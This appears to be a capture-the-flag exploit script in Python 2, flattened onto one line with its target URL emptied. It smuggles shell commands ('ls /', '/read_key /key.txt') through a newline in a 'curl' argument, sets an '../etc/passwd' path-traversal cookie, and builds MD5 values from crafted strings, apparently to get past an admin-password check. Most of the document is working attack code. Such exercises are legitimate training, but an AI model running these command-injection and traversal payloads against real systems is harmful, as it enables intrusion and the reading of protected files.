import requests headers = dict() headers = {'User-Agent': 'Mozilla/5.0'} cookies = {"diagsess":"../etc/passwd"} # doesn't matter cmd =" ls /" payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd} r ="", data=payload, cookies=cookies, headers=headers) print r.content[r.content.find(">xxx")+4:] cmd = "/read_key /key.txt" # or use python to read stderr # cmd = "python -c s=__import__('subprocess');print(s.check_output('/read_key'+chr(32)+'/key.txt',stderr=s.STDOUT,shell=True))" payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd} r ="", data=payload, cookies=cookies, headers=headers) print r.content[r.content.find(">xxx")+4:] # BTW, attempts to find an admin password # from class ListTable(list): """ Overridden list class which takes a 2-dimensional list of the form [[1,2,3],[4,5,6]], and renders an HTML Table in IPython Notebook. """ def _repr_html_(self): html = [""] for row in self: html.append("") html.extend("".format(col) for col in row) html.append("") html.append("
") return ''.join(html) from hashlib import md5 L =[ "djGFYmi", "ZkjAFaaaa", "G/I2/vILur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"), "Vf3ppC4Iu74AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"), "6Za/F6+mur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA= ".decode("base64"), 'Kdr.b4v', 'K1UgX15KGWDJKTdo', 'xIoN=JG', ' GE\x00\x00\x0f\xe5\xef\x0b'] L+=[ '' , '', '', ' \xbf\x13\x00\x00\xbd\xae\xcb`'] L+=[' \xcb<\x00\x00\xf9\xc8P\xd4', ' \x97\xa1\x00\x00T3z\x0c'] S = sorted( (md5(x).hexdigest(), x) for x in L ) ListTable([['Leading 0 or f', 'md5 hexdigest', 'plaintext']]+[[[i for i in range(len(s[0])-1) if s[0][i]!=s[0][i+1]][0]+1, s[0], repr(s[1])] for s in S]) with open('md5low','w') as f: f.write(' \xcb<\x00\x00\xf9\xc8P\xd4') with open('md5high', 'w') as f: f.write(' \x97\xa1\x00\x00T3z\x0c')